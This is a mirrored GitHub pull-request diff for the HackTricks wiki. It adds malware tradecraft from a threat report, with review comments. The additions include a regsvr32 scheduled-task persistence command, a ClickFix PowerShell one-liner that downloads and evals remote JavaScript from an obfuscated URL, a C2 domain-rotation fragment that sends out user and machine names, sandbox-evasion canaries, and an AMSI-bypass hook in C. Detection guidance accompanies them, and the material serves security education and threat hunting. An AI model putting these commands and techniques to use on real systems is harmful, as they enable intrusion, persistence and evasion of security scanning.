mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Merge pull request #1413 from HackTricks-wiki/update_Under_the_Pure_Curtain__From_RAT_to_Builder_to_Cod_20250916_184356
Under the Pure Curtain From RAT to Builder to Coder
This commit is contained in: commit 92692ccdc3
@ -267,7 +267,27 @@ regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
**Detected by defender**
#### Regsvr32 -sct
#### Regsvr32 – arbitrary DLL export with /i argument (gatekeeping & persistence)
Besides loading remote scriptlets (`scrobj.dll`), `regsvr32.exe` will load a local DLL and invoke its `DllRegisterServer`/`DllUnregisterServer` exports. Custom loaders frequently abuse this to execute arbitrary code while blending with a signed LOLBin. Two tradecraft notes seen in the wild:
- Gatekeeping argument: the DLL exits unless a specific switch is passed via `/i:<arg>`, e.g. `/i:--type=renderer` to mimic Chromium renderer children. This reduces accidental execution and frustrates sandboxes.
- Persistence: schedule `regsvr32` to run the DLL with silent + high privileges and the required `/i` argument, masquerading as an updater task:
```powershell
Register-ScheduledTask \
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
-RunLevel Highest
```
See also: ClickFix clipboard‑to‑PowerShell variant that stages a JS loader and later persists with `regsvr32`.
{{#ref}}
../../generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
{{#endref}}
[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
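Review bot: the PowerShell block under the "Persistence" bullet does not parse as written. PowerShell continues a line with a backtick, not a trailing `\`, and `\"` is not an escape inside a double-quoted string, so `-Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\""` terminates the string at the first `\"`. Either present the call on one line or use backtick continuation with `` `" `` (or single quotes) for the inner quotes. `-TaskPath '\\GoogleSystem\\GoogleUpdater'` also keeps both backslashes literally (single-quoted strings do not unescape), while the detection bullet added in the ClickFix hunk of this same PR cites the path as `\GoogleSystem\GoogleUpdater`; the two should agree so hunting queries match the documented artefact. Since this is described as tradecraft "seen in the wild", say which report it was taken from (the Check Point reference added below) next to the snippet.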
@ -555,6 +575,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
- [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
- [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../../banners/hacktricks-training.md}}
@ -65,7 +65,45 @@ mshta https://iplogger.co/xxxx =+\\xxx
The **mshta** call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (CAB), reconstructs `AutoIt3.exe` through `extrac32` & file concatenation and finally runs an `.a3x` script which exfiltrates browser credentials to `sumeriavgv.digital`.
## Detection & Hunting
## ClickFix: Clipboard → PowerShell → JS eval → Startup LNK with rotating C2 (PureHVNC)
Some ClickFix campaigns skip file downloads entirely and instruct victims to paste a one‑liner that fetches and executes JavaScript via WSH, persists it, and rotates C2 daily. Example observed chain:
```powershell
powershell -c "$j=$env:TEMP+'\a.js';sc $j 'a=new
ActiveXObject(\"MSXML2.XMLHTTP\");a.open(\"GET\",\"63381ba/kcilc.ellrafdlucolc//:sptth\".split(\"\").reverse().join(\"\"),0);a.send();eval(a.responseText);';wscript $j" Prеss Entеr
```
Key traits
- Obfuscated URL reversed at runtime to defeat casual inspection.
- JavaScript persists itself via a Startup LNK (WScript/CScript), and selects the C2 by current day – enabling rapid domain rotation.
Minimal JS fragment used to rotate C2s by date:
```js
function getURL() {
var C2_domain_list = ['stathub.quest','stategiq.quest','mktblend.monster','dsgnfwd.xyz','dndhub.xyz'];
var current_datetime = new Date().getTime();
var no_days = getDaysDiff(0, current_datetime);
return 'https://'
+ getListElement(C2_domain_list, no_days)
+ '/Y/?t=' + current_datetime
+ '&v=5&p=' + encodeURIComponent(user_name + '_' + pc_name + '_' + first_infection_datetime);
}
```
Next stage commonly deploys a loader that establishes persistence and pulls a RAT (e.g., PureHVNC), often pinning TLS to a hardcoded certificate and chunking traffic.
Detection ideas specific to this variant
- Process tree: `explorer.exe` → `powershell.exe -c` → `wscript.exe <temp>\a.js` (or `cscript.exe`).
- Startup artifacts: LNK in `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` invoking WScript/CScript with a JS path under `%TEMP%`/`%APPDATA%`.
- Registry/RunMRU and command‑line telemetry containing `.split('').reverse().join('')` or `eval(a.responseText)`.
- Repeated `powershell -NoProfile -NonInteractive -Command -` with large stdin payloads to feed long scripts without long command lines.
- Scheduled Tasks that subsequently execute LOLBins such as `regsvr32 /s /i:--type=renderer "%APPDATA%\Microsoft\SystemCertificates\<name>.dll"` under an updater‑looking task/path (e.g., `\GoogleSystem\GoogleUpdater`).
Threat hunting
- Daily‑rotating C2 hostnames and URLs with `.../Y/?t=<epoch>&v=5&p=<encoded_user_pc_firstinfection>` pattern.
- Correlate clipboard write events followed by Win+R paste then immediate `powershell.exe` execution.
Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
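Review bot: the new `## ClickFix: Clipboard → PowerShell → JS eval → Startup LNK with rotating C2 (PureHVNC)` heading is inserted between the existing `## Detection & Hunting` heading and its body (`Blue-teams can combine clipboard, process-creation and registry telemetry ...`), so after this change that body renders under the ClickFix section and "Detection & Hunting" is left as an empty section. Move the new section above `## Detection & Hunting`, or demote it to `###` so it sits inside the existing section alongside the detection ideas it already carries. Two smaller points: the `getURL()` fragment calls `getDaysDiff` and `getListElement` and reads `user_name`, `pc_name` and `first_infection_datetime`, none of which are shown; add a sentence saying these are elided helpers and globals from the sample (and that the day count is what indexes the domain list, per the "selects the C2 by current day" bullet) so the snippet is not mistaken for complete code. And `Prеss Entеr` at the end of the one-liner contains Cyrillic `е` homoglyphs; if that is the observed lure text, say so explicitly, because it is a useful hunting string in its own right and otherwise reads as a typo.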
@ -93,5 +131,6 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin
- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../../banners/hacktricks-training.md}}
@ -17,6 +17,11 @@
| write() | send() |
| shutdown() | WSACleanup() |
### TLS pinning and chunked transport
Many loaders wrap their TCP stream in `SslStream` and pin the server’s leaf certificate against an embedded copy (certificate pinning). Bot info/tasks are compressed (e.g., GZip). When responses exceed a threshold (~1 MB), data is fragmented into small chunks (e.g., 16 KB segments) to avoid size-based heuristics and reduce memory spikes during deserialisation.
### Persistence
| Registry | File | Service |
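Review bot: `SslStream` is a .NET type, so this paragraph silently assumes the loaders in question are .NET, while the surrounding table lists Win32 socket APIs (`send()`, `WSACleanup()`); state the runtime the paragraph applies to so the reader knows why the two coexist. The pinning sentence also deserves its defender-side consequence: a client that pins the server leaf certificate against an embedded copy will abort the handshake under TLS inspection, so a process that repeatedly opens TLS connections and drops them right after receiving the server certificate is a direct hunting signal for this behaviour. Finally, "~1 MB" and "16 KB" are given as examples; if they were measured on a specific sample in the referenced report, say which, otherwise mark them as illustrative.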
@ -49,6 +54,24 @@
| CreateToolhelp32Snapshot \[Check if a process is running] | |
| CreateFileW/A \[Check if a file exist] | |
### Emulator API fingerprinting & sleep evasion
Malware often fingerprints sandbox emulators by searching for Defender’s virtualised exports (seen in the Malware Protection Emulator). If any of these symbols are present (case-insensitive scan of the process), execution is delayed for 10–30 minutes and re-checked to waste analysis time.
Examples of API names used as canaries:
- `MpVmp32Entry`, `MpVmp32FastEnter`, `MpCallPreEntryPointCode`, `MpCallPostEntryPointCode`, `MpFinalize`, `MpReportEvent*`, `MpSwitchToNextThread*`
- `VFS_*` family: `VFS_Open`, `VFS_Read`, `VFS_MapViewOfFile`, `VFS_UnmapViewOfFile`, `VFS_FindFirstFile/FindNextFile`, `VFS_CopyFile`, `VFS_DeleteFile`, `VFS_MoveFile`
- `ThrdMgr_*`: `ThrdMgr_GetCurrentThreadHandle`, `ThrdMgr_SaveTEB`, `ThrdMgr_SwitchThreads`
Typical delay primitive (user-land):
```cmd
cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul
```
Argument gatekeeping
- Operators sometimes require a benign-looking CLI switch to be present before running the payload (e.g., `/i:--type=renderer` to mimic Chromium child processes). If the switch is absent, the loader exits immediately, hindering naive sandbox execution.
### Stealth
| Name | |
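Review bot: `%RANDOM_IN_[600,1800]%` in the `cmd /c timeout /t ... > nul` line is not cmd syntax (it reads like an environment-variable expansion), so label it as a placeholder for a value chosen in that range rather than leaving it inside a fenced `cmd` block that looks copy-ready. "case-insensitive scan of the process" should say what is scanned (export tables of loaded modules versus strings in process memory), because that determines which telemetry a defender can use to observe the fingerprinting. The "Argument gatekeeping" bullet repeats the `/i:--type=renderer` material this same PR adds to the regsvr32 section; link to that section instead of duplicating it so the two descriptions do not drift apart.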
@ -190,6 +213,7 @@ Detection ideas:
## References
- [Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../banners/hacktricks-training.md}}
@ -275,7 +275,42 @@ This technique was initially discovered by [@RastaMouse](https://twitter.com/_Ra
There are also many other techniques used to bypass AMSI with powershell, check out [**this page**](basic-powershell-for-pentesters/index.html#amsi-bypass) and [**this repo**](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) to learn more about them.
This tools [**https://github.com/Flangvik/AMSI.fail**](https://github.com/Flangvik/AMSI.fail) also generates script to bypass AMSI.
### Blocking AMSI by preventing amsi.dll load (LdrLoadDll hook)
AMSI is initialised only after `amsi.dll` is loaded into the current process. A robust, language‑agnostic bypass is to place a user‑mode hook on `ntdll!LdrLoadDll` that returns an error when the requested module is `amsi.dll`. As a result, AMSI never loads and no scans occur for that process.
Implementation outline (x64 C/C++ pseudocode):
```c
#include <windows.h>
#include <winternl.h>
typedef NTSTATUS (NTAPI *pLdrLoadDll)(PWSTR, ULONG, PUNICODE_STRING, PHANDLE);
static pLdrLoadDll realLdrLoadDll;
NTSTATUS NTAPI Hook_LdrLoadDll(PWSTR path, ULONG flags, PUNICODE_STRING module, PHANDLE handle){
if (module && module->Buffer){
UNICODE_STRING amsi; RtlInitUnicodeString(&amsi, L"amsi.dll");
if (RtlEqualUnicodeString(module, &amsi, TRUE)){
// Pretend the DLL cannot be found → AMSI never initialises in this process
return STATUS_DLL_NOT_FOUND; // 0xC0000135
}
}
return realLdrLoadDll(path, flags, module, handle);
}
void InstallHook(){
HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
realLdrLoadDll = (pLdrLoadDll)GetProcAddress(ntdll, "LdrLoadDll");
// Apply inline trampoline or IAT patching to redirect to Hook_LdrLoadDll
// e.g., Microsoft Detours / MinHook / custom 14‑byte jmp thunk
}
```
Notes
- Works across PowerShell, WScript/CScript and custom loaders alike (anything that would otherwise load AMSI).
- Pair with feeding scripts over stdin (`PowerShell.exe -NoProfile -NonInteractive -Command -`) to avoid long command‑line artefacts.
- Seen used by loaders executed through LOLBins (e.g., `regsvr32` calling `DllRegisterServer`).
This tools [https://github.com/Flangvik/AMSI.fail](https://github.com/Flangvik/AMSI.fail) also generates script to bypass AMSI.
**Remove the detected signature**
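Review bot: after this change the sentence "This tools ... AMSI.fail also generates script to bypass AMSI." appears twice, once as the existing line with the bold link above the new subsection and once re-added after the "Notes" list; drop the second copy and fix the grammar of the one that stays ("This tool ... also generates scripts"). The block is labelled "pseudocode", which is fine, but it should say so in the code's own comments too, since `RtlEqualUnicodeString` is not declared by `winternl.h` and readers will otherwise report the block as a compile bug. For the blue-team reader, pair the technique with its observable, which follows directly from "AMSI never loads": a `powershell.exe` or `wscript.exe` process whose loaded-module list never contains `amsi.dll`, or whose in-memory `ntdll!LdrLoadDll` prologue differs from the on-disk image, is the artefact this bypass leaves behind.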
@ -906,4 +941,6 @@ References for PPL and tooling
- [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [Zero Salarium – Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
- [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../banners/hacktricks-training.md}}
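Review bot: the new Check Point entry is separated from the preceding `- [Zero Salarium ...]` item by a blank line, so it no longer continues the "References for PPL and tooling" list but starts a second list; remove the blank line. The same reference is added to four pages in this PR, which is fine, but on each page it would help to name the section of the report that backs the claim it is attached to (scheduled-task persistence, ClickFix chain, emulator fingerprinting, AMSI blocking) rather than adding the bare link.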